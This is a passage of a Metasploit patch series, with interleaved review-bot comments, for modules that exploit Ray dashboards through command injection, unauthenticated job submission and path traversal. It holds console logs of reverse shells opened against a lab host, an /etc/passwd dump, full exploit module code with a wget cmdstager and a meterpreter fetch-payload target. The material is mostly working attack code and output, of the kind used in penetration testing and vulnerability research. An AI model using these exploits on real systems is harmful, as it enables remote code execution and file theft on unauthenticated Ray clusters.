- -whoami -ray -pwd -/home/ray -``` - -### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (RCE, target 0) -``` -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 -rhost => 192.168.56.6 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 -lhost => 192.168.56.1 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set attack RCE -attack => RCE -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 0 -target => 0 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x64/shell/reverse_tcp -payload => linux/x64/shell/reverse_tcp -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run - -[*] Started reverse TCP handler on 192.168.56.1:4444 -[*] Running automatic check ("set AutoCheck false" to disable) -[!] The service is running, but could not be validated. -[+] Command execution successful. Job ID: 'raysubmit_hUcEzX4nBCdr5m3m' Submission ID: 'raysubmit_hUcEzX4nBCdr5m3m' -[*] Using URL: http://192.168.56.1:8080/lISIUc6V -[*] Command Stager progress - 100.00% done (113/113 bytes) -[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /lISIUc6V -[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) -[*] Sending stage (38 bytes) to 192.168.56.6 -[*] Command shell session 6 opened (192.168.56.1:4444 -> 192.168.56.6:49312) at 2024-08-07 21:07:51 +0900 -[*] Server stopped. 
- -whoami -ray -pwd -/home/ray -``` - -### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (RCE, target 1) -``` -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 -rhost => 192.168.56.6 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 -lhost => 192.168.56.1 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set attack RCE -attack => RCE -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 1 -target => 1 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x86/shell/reverse_tcp -payload => linux/x86/shell/reverse_tcp -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run - -[*] Started reverse TCP handler on 192.168.56.1:4444 -[*] Running automatic check ("set AutoCheck false" to disable) -[!] The service is running, but could not be validated. -[+] Command execution successful. Job ID: 'raysubmit_arSdaUWQZPCJy4mr' Submission ID: 'raysubmit_arSdaUWQZPCJy4mr' -[*] Using URL: http://192.168.56.1:8080/OPTAuZv1pjimlr -[*] Command Stager progress - 100.00% done (119/119 bytes) -[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /OPTAuZv1pjimlr -[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) -[*] Sending stage (36 bytes) to 192.168.56.6 -[*] Command shell session 5 opened (192.168.56.1:4444 -> 192.168.56.6:45048) at 2024-08-07 21:06:40 +0900 -[*] Server stopped. - -whoami -ray -pwd -/home/ray -``` - -### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (LFI) -``` -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 -rhost => 192.168.56.6 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 -lhost => 192.168.56.1 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set attack LFI -attack => LFI -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run - -[*] Started reverse TCP handler on 192.168.56.1:4444 -[*] Running automatic check ("set AutoCheck false" to disable) -[+] The target is vulnerable. 
-[+] /etc/passwd -root:x:0:0:root:/root:/bin/bash -daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin -bin:x:2:2:bin:/bin:/usr/sbin/nologin -sys:x:3:3:sys:/dev:/usr/sbin/nologin -sync:x:4:65534:sync:/bin:/bin/sync -games:x:5:60:games:/usr/games:/usr/sbin/nologin -man:x:6:12:man:/var/cache/man:/usr/sbin/nologin -lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin -mail:x:8:8:mail:/var/mail:/usr/sbin/nologin -news:x:9:9:news:/var/spool/news:/usr/sbin/nologin -uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin -proxy:x:13:13:proxy:/bin:/usr/sbin/nologin -www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin -backup:x:34:34:backup:/var/backups:/usr/sbin/nologin -list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin -irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin -gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin -nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin -_apt:x:100:65534::/nonexistent:/usr/sbin/nologin -ray:x:1000:100::/home/ray:/bin/bash -``` diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb deleted file mode 100644 index 51cf4fb440..0000000000 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ /dev/null 
@@ -1,178 +0,0 @@ -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::CmdStager - prepend Msf::Exploit::Remote::AutoCheck - - def initialize(info = {}) - super( - update_info( - info, - 'Name' => 'Ray cpu_profile command injection, Ray Agent Job RCE and Ray static arbitrary file read', - 'Description' => %q{ - Ray RCE via cpu_profile command injection vulnerability. - - RCE in Ray via the agent job submission endpoint. - This is intended functionality as Ray's main purpose is executing arbitrary workloads. - By default Ray has no authentication. - - Ray before 2.8.1 is vulnerable to a local file inclusion. - }, - 'Author' => [ - 'sierrabearchell', # Vulnerability discovery - 'byt3bl33d3r ', # Python Metasploit module - 'danmcinerney ', # Python Metasploit module - 'Takahiro Yokoyama' # Metasploit module - ], - 'License' => MSF_LICENSE, - 'References' => [ - ['CVE', '2023-6019'], - ['URL', 'https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe/'], - # RCE - ['URL', 'https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/'], - ['URL', 'https://huntr.com/bounties/787a07c0-5535-469f-8c53-3efa4e5717c7/'], - ['CVE', '2023-6020'], - ['URL', 'https://huntr.com/bounties/83dd8619-6dc3-4c98-8f1b-e620fedcd1f6/'], - ['URL', 'https://github.com/protectai/ai-exploits/tree/main/ray'] - ], - 'CmdStagerFlavor' => %i[wget], - 'Payload' => { - 'DisableNops' => true - }, - 'Platform' => %w[linux], - 'Targets' => [ - [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ], - [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], - [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => '2023-11-15', - 'Notes' => { - 'Stability' => [ CRASH_SAFE, ], - 
'SideEffects' => [], - 'Reliability' => [ REPEATABLE_SESSION, ] - } - ) - ) - - register_options( - [ - Opt::RPORT(8265), - OptEnum.new('ATTACK', [true, 'The attack type to use. Default is CMDi (CVE-2023-6019). but RCE (No CVE) and LFI (CVE-2023-6020) can also be chosen.', 'CMDi', ['CMDi', 'RCE', 'LFI']]), - OptString.new('COMMAND', [ false, 'The command to execute', 'echo \'Hello from Metasploit\'' ]), - OptString.new('FILEPATH', [ false, 'File to read', '/etc/passwd']) - ] - ) - end - - def get_nodes - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, 'nodes?view=summary') - }) - return unless res && res.code == 200 - - JSON.parse(res.body) - end - - def get_job_data(cmd) - fail_with(Failure::Unknown, 'COMMAND required when ATTACK is RCE') unless cmd - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, 'api/jobs/'), - 'data' => { 'entrypoint' => cmd }.to_json - }) - unless res && res.code == 200 - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, 'api/job_agent/jobs/'), - 'data' => { 'entrypoint' => cmd }.to_json - }) - end - return unless res && res.code == 200 - - JSON.parse(res.body) - end - - def lfi - fail_with(Failure::Unknown, 'FILEPATH required when ATTACK is LFI') unless datastore['FILEPATH'] - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{datastore['FILEPATH']}") - }) - return unless res && res.code == 200 - - res.body - end - - def check - case datastore['ATTACK'] - when 'CMDi' - @nodes = get_nodes - return Exploit::CheckCode::Safe if @nodes.nil? - when 'RCE' - @job_data = get_job_data(datastore['COMMAND']) - return Exploit::CheckCode::Safe if @job_data.nil? - when 'LFI' - @file_content = lfi - return Exploit::CheckCode::Safe if @file_content.nil? 
- - return Exploit::CheckCode::Vulnerable - end - Exploit::CheckCode::Detected - end - - def exploit - case datastore['ATTACK'] - when 'CMDi' - # We need to pass valid node info to /worker/cpu_profile for the server to process the request - # First we list all nodes and grab the pid and ip of the first one (could be any) - @nodes ||= get_nodes - fail_with(Failure::Unknown, 'Failed to get nodes') unless @nodes - first_node = @nodes['data']['summary'].first - fail_with(Failure::Unknown, 'Failed to get pid') unless first_node.key?('agent') && first_node['agent'].key?('pid') - pid = first_node['agent']['pid'] - fail_with(Failure::Unknown, 'Failed to get ip') unless first_node.key?('ip') - ip = first_node['ip'] - print_good("Grabbed node info, pid: #{pid}, ip: #{ip}") - opts = { pid: pid, ip: ip } - res = execute_command(datastore['COMMAND'], opts) - fail_with(Failure::Unknown, 'Failed to execute command') unless res - print_good("Command execution seems to have been successful. Status code: #{res.code}") - execute_cmdstager({ flavor: :wget }.merge(opts)) - when 'RCE' - @job_data ||= get_job_data(datastore['COMMAND']) - print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'") - execute_cmdstager({ flavor: :wget }) - when 'LFI' - @file_content ||= lfi - print_good("#{datastore['FILEPATH']}\n#{@file_content}") - end - end - - def execute_command(cmd, opts = {}) - case datastore['ATTACK'] - when 'CMDi' - send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, 'worker/cpu_profile'), - 'vars_get' => { - 'pid' => opts[:pid], - 'ip' => opts[:ip], - 'duration' => 5, - 'native' => 0, - 'format' => "`#{cmd}`" - } - }) - when 'RCE' - get_job_data(cmd) - end - end - -end From eeab7ce2a22db3cb0a90394366d758d1ddd6e45f Mon Sep 17 00:00:00 2001 
From: Takah1ro Date: Fri, 16 Aug 2024 08:23:50 +0900 Subject: [PATCH 25/42] Proceed when user specified cmd fails --- modules/exploits/linux/http/ray_agent_job_rce.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb index 96534522fb..0c941557f7 100644 --- a/modules/exploits/linux/http/ray_agent_job_rce.rb +++ b/modules/exploits/linux/http/ray_agent_job_rce.rb @@ -85,8 +85,9 @@ class MetasploitModule < Msf::Exploit::Remote def exploit @job_data ||= get_job_data(datastore['COMMAND']) - fail_with(Failure::Unknown, 'Failed to get job_data') unless @job_data - print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'") + if @job_data + print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'") + end execute_cmdstager({ flavor: :wget }) end From 7258ca4fb19e92f2bbd235a5ecf2a7d65c9bb8c2 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Fri, 16 Aug 2024 08:49:34 +0900 Subject: [PATCH 26/42] Remove unnecessary option for simplicity --- .../modules/exploit/linux/http/ray_agent_job_rce.md | 4 ---- modules/exploits/linux/http/ray_agent_job_rce.rb | 5 ++--- 2 files changed, 2 insertions(+), 7 deletions(-) diff --git a/documentation/modules/exploit/linux/http/ray_agent_job_rce.md b/documentation/modules/exploit/linux/http/ray_agent_job_rce.md index 880d41aa4e..2a55c1d9bd 100644 --- a/documentation/modules/exploit/linux/http/ray_agent_job_rce.md +++ b/documentation/modules/exploit/linux/http/ray_agent_job_rce.md @@ -33,10 +33,6 @@ This module was successfully tested on: ## Options -### COMMAND (Required) - -This is the command to execute. Default is `echo 'Hello from Metasploit'`. - ## Scenarios ### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 0) 
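Review bot: With the `fail_with` removed, a nil `@job_data` now falls straight through to `execute_cmdstager` with no output at all, so the operator cannot tell that the probe submission already failed before the stager starts issuing the same kind of request. Add an `else` branch to the new `if @job_data` so the condition is visible in the log: `print_warning('Initial job submission failed; attempting the command stager anyway')`. A one-line comment above the `if` stating why continuing is deliberate (the probe command may be rejected while the stager's own submission still runs, which is what the commit title implies) would also stop the next maintainer from reinstating the hard failure.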
diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb index 0c941557f7..81d9d1f279 100644 --- a/modules/exploits/linux/http/ray_agent_job_rce.rb +++ b/modules/exploits/linux/http/ray_agent_job_rce.rb @@ -53,7 +53,6 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ Opt::RPORT(8265), - OptString.new('COMMAND', [ true, 'The command to execute', 'echo \'Hello from Metasploit\'' ]), ] ) end @@ -77,14 +76,14 @@ class MetasploitModule < Msf::Exploit::Remote end def check - @job_data = get_job_data(datastore['COMMAND']) + @job_data = get_job_data('ls') return Exploit::CheckCode::Safe if @job_data.nil? Exploit::CheckCode::Detected end def exploit - @job_data ||= get_job_data(datastore['COMMAND']) + @job_data ||= get_job_data('ls') if @job_data print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'") end From 209f172aa1c06c99e2a056ce6cedf1493a2cebcd Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Fri, 16 Aug 2024 08:56:01 +0900 Subject: [PATCH 27/42] Update document --- documentation/modules/exploit/linux/http/ray_agent_job_rce.md | 1 + 1 file changed, 1 insertion(+) diff --git a/documentation/modules/exploit/linux/http/ray_agent_job_rce.md b/documentation/modules/exploit/linux/http/ray_agent_job_rce.md index 2a55c1d9bd..40912be708 100644 --- a/documentation/modules/exploit/linux/http/ray_agent_job_rce.md +++ b/documentation/modules/exploit/linux/http/ray_agent_job_rce.md @@ -32,6 +32,7 @@ This module was successfully tested on: 7. You should get a shell or meterpreter ## Options +No options ## Scenarios From f902ae84fe9b5c0068c4cb18dea97dd6aade32c8 Mon Sep 17 00:00:00 2001 
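Review bot: `check` now calls `get_job_data('ls')`, which submits a real job to the target rather than passively inspecting it, so the check is intrusive and leaves a job record (and whatever logging the Ray job API does) on the victim even when the operator only runs `check`. That should be stated in a comment above the call, e.g. `# NOTE: intrusive check - submits a harmless 'ls' job that will appear in the target's job list`, and the module's `Notes` should carry `IOC_IN_LOGS` (the Notes block is outside this hunk, so I cannot confirm what it currently declares). `exploit` then repeats `get_job_data('ls')` when `check` was skipped, purely to print a job ID, which means two probe jobs per run on top of the real one; consider dropping the probe from `exploit` and reporting the ID of the actual payload submission instead.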
From: Takahiro Yokoyama Date: Tue, 20 Aug 2024 07:45:38 +0900 Subject: [PATCH 28/42] Update modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb Avoid check method being controlled by the 'FILEPATH' content Co-authored-by: Diego Ledda --- modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb index e50dd4898b..9117c24432 100644 --- a/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb +++ b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb @@ -45,10 +45,19 @@ class MetasploitModule < Msf::Auxiliary end def check - @file_content = lfi - return Exploit::CheckCode::Safe if @file_content.nil? + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'api/version') + }) + return Exploit::CheckCode::Unknown unless res && res.code == 200 - Exploit::CheckCode::Vulnerable + ray_version = res.get_json_document['ray_version'] + + return Exploit::CheckCode::Unknown unless ray_version + + return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3') + + return Exploit::CheckCode::Appears end def lfi From 12320803409a7ba29b6488f133c9590884e99a8f Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Tue, 20 Aug 2024 08:09:12 +0900 Subject: [PATCH 29/42] Update lfi module --- modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb index 9117c24432..13d52cb1f0 100644 --- a/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb +++ b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb 
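Review bot: `ray_version` is an attacker-controlled string taken from the target's `/api/version` response and passed straight to `Rex::Version.new`, which (like its `Gem::Version` parent) raises `ArgumentError` on a malformed version string, so a non-standard or deliberately odd value turns `check` into an exception instead of a `CheckCode`. Guard it first with `return Exploit::CheckCode::Unknown unless Rex::Version.correct?(ray_version)` (inherited from `Gem::Version`; confirm it is available on the framework's `Rex::Version`). The `<= 2.6.3` cut-off also needs a citation: the combined module deleted earlier in this series described the LFI as affecting Ray before 2.8.1, so 2.7.x and 2.8.0 targets would now be reported `Safe` without ever sending the traversal request. Either document the source of the 2.6.3 boundary in a comment or return `Detected` rather than `Safe` for newer versions so the operator can still run the module.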
@@ -57,13 +57,16 @@ class MetasploitModule < Msf::Auxiliary return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3') + file_content = lfi('/etc/passwd') + return Exploit::CheckCode::Vulnerable unless file_content.nil? + return Exploit::CheckCode::Appears end - def lfi + def lfi(filepath) res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{datastore['FILEPATH']}") + 'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{filepath}") }) return unless res && res.code == 200 @@ -71,9 +74,9 @@ class MetasploitModule < Msf::Auxiliary end def run - @file_content ||= lfi - fail_with(Failure::Unknown, 'Failed to execute LFI') unless @file_content - print_good("#{datastore['FILEPATH']}\n#{@file_content}") + file_content = lfi(datastore['FILEPATH']) + fail_with(Failure::Unknown, 'Failed to execute LFI') unless file_content + print_good("#{datastore['FILEPATH']}\n#{file_content}") end end From 17ea7d2b723c233e3c531c5ed4e586568db300c8 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Tue, 20 Aug 2024 08:15:16 +0900 Subject: [PATCH 30/42] Remove explicit return --- modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb index 13d52cb1f0..de0066a486 100644 --- a/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb +++ b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb @@ -60,7 +60,7 @@ class MetasploitModule < Msf::Auxiliary file_content = lfi('/etc/passwd') return Exploit::CheckCode::Vulnerable unless file_content.nil? - return Exploit::CheckCode::Appears + Exploit::CheckCode::Appears end def lfi(filepath) From 5be7e09ff0cea6b5e23b75c75706348c3321d7f5 Mon Sep 17 00:00:00 2001 
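Review bot: `check` returns `Vulnerable` whenever `lfi('/etc/passwd')` yields any HTTP 200 body, but `lfi` does not inspect the content, so a dashboard that answers unknown paths with a fallback page (a single-page-app index, for example) would be reported as exploitable. Tie the verdict to the file actually coming back, e.g. `return Exploit::CheckCode::Vulnerable if file_content&.match?(/^root:[^:]*:0:0:/)`, and fall through to `Appears` otherwise. The same content test would make a useful inline comment on why `/etc/passwd` was chosen as the probe file.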
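Review bot: `run` only prints the retrieved file with `print_good`, which is lossy for binary content and long files and leaves nothing in the database for a gather module. Store the result as loot and report the path, e.g. `path = store_loot('ray.lfi', 'text/plain', rhost, file_content, File.basename(datastore['FILEPATH']))` followed by `print_good("File saved to #{path}")`, keeping the `print_good` of the content for small text files if desired. The `Failure::Unknown` on a nil result would also read better as `Failure::NotVulnerable` or `Failure::UnexpectedReply`, since `lfi` returns nil precisely when the server did not answer 200.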
From: Takah1ro Date: Tue, 20 Aug 2024 08:21:48 +0900 Subject: [PATCH 31/42] Update check to use version info --- .../exploits/linux/http/ray_agent_job_rce.rb | 18 +++++++++++++++--- 1 file changed, 15 insertions(+), 3 deletions(-) diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb index 81d9d1f279..8ea87f6ba8 100644 --- a/modules/exploits/linux/http/ray_agent_job_rce.rb +++ b/modules/exploits/linux/http/ray_agent_job_rce.rb @@ -76,10 +76,22 @@ class MetasploitModule < Msf::Exploit::Remote end def check - @job_data = get_job_data('ls') - return Exploit::CheckCode::Safe if @job_data.nil? + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'api/version') + }) + return Exploit::CheckCode::Unknown unless res && res.code == 200 - Exploit::CheckCode::Detected + ray_version = res.get_json_document['ray_version'] + + return Exploit::CheckCode::Unknown unless ray_version + + return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3') + + @job_data = get_job_data('ls') + return Exploit::CheckCode::Vulnerable unless @job_data.nil? + + Exploit::CheckCode::Appears end def exploit From a5b9d553fad144f58e4c7bfbc7dc10aa2116d3a1 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Tue, 20 Aug 2024 08:25:27 +0900 Subject: [PATCH 32/42] Update check to use version info --- ..._cpu_profile_cmd_injection_cve_2023_6019.rb | 18 +++++++++++++++--- 1 file changed, 15 insertions(+), 3 deletions(-) diff --git a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb index 0dafcf6bfa..2172e4304e 100644 --- a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb +++ b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb 
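Review bot: Returning `Safe` whenever the reported version is above 2.6.3 is a likely false negative for this module: the description in the combined module deleted earlier in this series states that job submission is intended functionality and that Ray has no authentication by default, so a newer release with an exposed dashboard is still exploitable by exactly the request this module sends. Return `Exploit::CheckCode::Detected` (or go on to the `get_job_data('ls')` probe) for newer versions instead of `Safe`, and add a comment recording where the 2.6.3 boundary comes from. As in the LFI module, `Rex::Version.new(ray_version)` is fed an unvalidated server-supplied string and will raise on a malformed value; guard it with `Rex::Version.correct?` and return `Unknown`. Note also that the `ls` probe in `check` is intrusive and creates a job on the target, which deserves a comment and an `IOC_IN_LOGS` note.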
@@ -66,10 +66,22 @@ class MetasploitModule < Msf::Exploit::Remote end def check - @nodes = get_nodes - return Exploit::CheckCode::Safe if @nodes.nil? + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'api/version') + }) + return Exploit::CheckCode::Unknown unless res && res.code == 200 - Exploit::CheckCode::Detected + ray_version = res.get_json_document['ray_version'] + + return Exploit::CheckCode::Unknown unless ray_version + + return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3') + + @nodes = get_nodes + return Exploit::CheckCode::Vulnerable unless @nodes.nil? + + Exploit::CheckCode::Appears end def exploit From 64bdf54bb07ed5a90dec4bafe5f82b1b7b7a0c53 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Tue, 20 Aug 2024 08:56:05 +0900 Subject: [PATCH 33/42] Use Fetch Payload (Not tested) --- modules/exploits/linux/http/ray_agent_job_rce.rb | 16 ++++++++++++++-- 1 file changed, 14 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb index 8ea87f6ba8..7c7142fa3c 100644 --- a/modules/exploits/linux/http/ray_agent_job_rce.rb +++ b/modules/exploits/linux/http/ray_agent_job_rce.rb @@ -38,7 +38,14 @@ class MetasploitModule < Msf::Exploit::Remote 'Targets' => [ [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ], [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], - [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ] + [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ], + [ + 'Linux Command', { + 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd, 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp' + } + } + ] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2023-11-15', 
@@ -99,7 +106,12 @@ class MetasploitModule < Msf::Exploit::Remote if @job_data print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'") end - execute_cmdstager({ flavor: :wget }) + case target['Type'] + when :nix_cmd + execute_command(payload.encoded) + else + execute_cmdstager({ flavor: :wget }) + end end def execute_command(cmd, _opts = {}) From 99c81d78213bb4276b8726da3f47c65a70e76185 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Tue, 20 Aug 2024 08:59:39 +0900 Subject: [PATCH 34/42] Set default fetch_command to wget --- modules/exploits/linux/http/ray_agent_job_rce.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb index 7c7142fa3c..c1f03ce5c4 100644 --- a/modules/exploits/linux/http/ray_agent_job_rce.rb +++ b/modules/exploits/linux/http/ray_agent_job_rce.rb @@ -42,7 +42,8 @@ class MetasploitModule < Msf::Exploit::Remote [ 'Linux Command', { 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd, 'DefaultOptions' => { - 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp' + 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp', + 'FETCH_COMMAND' => 'WGET' } } ] From 52852cea7278a1d1da5587897e23cff77c8a6562 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Tue, 20 Aug 2024 12:59:52 +0900 Subject: [PATCH 35/42] Add cve ref --- documentation/modules/exploit/linux/http/ray_agent_job_rce.md | 2 +- modules/exploits/linux/http/ray_agent_job_rce.rb | 4 +++- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/linux/http/ray_agent_job_rce.md b/documentation/modules/exploit/linux/http/ray_agent_job_rce.md index 40912be708..e6469f77ea 100644 --- a/documentation/modules/exploit/linux/http/ray_agent_job_rce.md +++ b/documentation/modules/exploit/linux/http/ray_agent_job_rce.md 
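Review bot: The `case target['Type']` added to `exploit` has a single `when :nix_cmd` branch plus an `else`, which reads more directly as `if target['Type'] == :nix_cmd`. For the binary targets `target['Type']` is absent and the code relies on that nil to reach the cmdstager branch, which deserves a one-line comment, e.g. `# binary targets carry no 'Type' and are staged via wget; the command target delivers the fetch payload directly`. The same shape is added to the cpu_profile module's `exploit` in 37/42.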
@@ -1,6 +1,6 @@ ## Vulnerable Application -Ray (<=v2.6.3) is vulnerable to RCE via the agent job submission endpoint +Ray (<=v2.6.3) is vulnerable to RCE via the agent job submission endpoint (CVE-2023-48022) The vulnerability affects: diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb index c1f03ce5c4..b0b43bbe49 100644 --- a/modules/exploits/linux/http/ray_agent_job_rce.rb +++ b/modules/exploits/linux/http/ray_agent_job_rce.rb @@ -27,6 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote ], 'License' => MSF_LICENSE, 'References' => [ + ['CVE', '2023-48022'], ['URL', 'https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/'], ['URL', 'https://huntr.com/bounties/787a07c0-5535-469f-8c53-3efa4e5717c7/'] ], @@ -41,7 +42,8 @@ class MetasploitModule < Msf::Exploit::Remote [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ], [ 'Linux Command', { - 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd, 'DefaultOptions' => { + 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp', 'FETCH_COMMAND' => 'WGET' } From 45677898a8045f7ff28d0a8672bc74a1a45911dc Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Tue, 20 Aug 2024 13:08:01 +0900 Subject: [PATCH 36/42] Add TARGET_URI --- modules/exploits/linux/http/ray_agent_job_rce.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb index b0b43bbe49..e107d5b912 100644 --- 